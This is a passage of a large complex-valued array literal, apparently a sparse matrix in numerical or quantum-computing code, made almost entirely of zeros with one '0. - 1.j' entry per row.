0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
